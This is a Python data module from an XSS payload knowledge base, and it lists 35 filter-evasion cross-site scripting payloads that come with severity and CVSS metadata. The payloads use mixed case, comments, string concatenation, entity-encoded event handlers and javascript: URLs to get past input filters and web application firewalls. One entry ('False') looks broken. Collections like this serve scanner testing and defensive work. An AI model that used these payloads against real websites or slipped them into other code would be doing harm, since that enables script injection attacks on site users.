#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Filter Evasion Core Payloads - Part 1
"""

from typing import Dict

from ..models import PayloadEntry


FILTER_EVASION_CORE_PAYLOADS_PART1: Dict[str, PayloadEntry] = {
    "filter_evasion_001": PayloadEntry(
        payload="<Script>AleRt(1)</Script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_002": PayloadEntry(
        payload="<ScRiPt>AlErT(1)</ScRiPt>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_003": PayloadEntry(
        payload='<script>alert/**/("1")</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_004": PayloadEntry(
        payload='<script>alert(/**/"1")</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_005": PayloadEntry(
        payload='<script>self["ale"+"rt"](1)</script>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_006": PayloadEntry(
        payload="<script>prompt(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_007": PayloadEntry(
        payload="<script>confirm(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_008": PayloadEntry(
        payload="<script>console.log(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_009": PayloadEntry(
        payload="<script>console.error(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_010": PayloadEntry(
        payload="<script>alert(1)",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_011": PayloadEntry(
        payload="<script>alert(1)//</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_012": PayloadEntry(
        payload="<script>alert(1)/*</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_013": PayloadEntry(
        payload="<<script>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_014": PayloadEntry(
        payload="<script<script>alert(1)</script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_015": PayloadEntry(
        payload="<script>alert(1)<</script>/script>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_016": PayloadEntry(
        payload="<foreignObject><script>alert(1)</script></foreignObject>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_017": PayloadEntry(
        payload="False",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_018": PayloadEntry(
        payload='<button formaction="javascript:alert(1)">',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_019": PayloadEntry(
        payload='<style>@import"javascript:alert(1)";</style>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_020": PayloadEntry(
        payload='<style>body{background:url("javascript:alert(1)")}</style>',
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_021": PayloadEntry(
        payload="<img src=x OnError=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_022": PayloadEntry(
        payload="<img src=x ONERROR=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_023": PayloadEntry(
        payload="<img src=x onError=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_024": PayloadEntry(
        payload="<img src=x onerror =alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_025": PayloadEntry(
        payload="<img src=x onerror= alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_026": PayloadEntry(
        payload="<img src=x onerror = alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_027": PayloadEntry(
        payload="<img src=x onerror=`alert(1)`>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_028": PayloadEntry(
        payload="<img src=x o&#110;error=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_029": PayloadEntry(
        payload="<img src=x on&#101;rror=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_030": PayloadEntry(
        payload="<img src=x &#111;nerror=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_031": PayloadEntry(
        payload="<img src=x onload=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_032": PayloadEntry(
        payload="<img src=x onabort=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_033": PayloadEntry(
        payload="<img src=x oninvalid=alert(1)>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_034": PayloadEntry(
        payload="<select onfocus=alert(1) autofocus>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
    "filter_evasion_035": PayloadEntry(
        payload="<textarea onfocus=alert(1) autofocus>",
        contexts=["html_content"],
        severity="high",
        cvss_score=7.5,
        description="Filter Evasion payload",
        tags=["filter-evasion", "encoding"],
        waf_evasion=True,
    ),
}
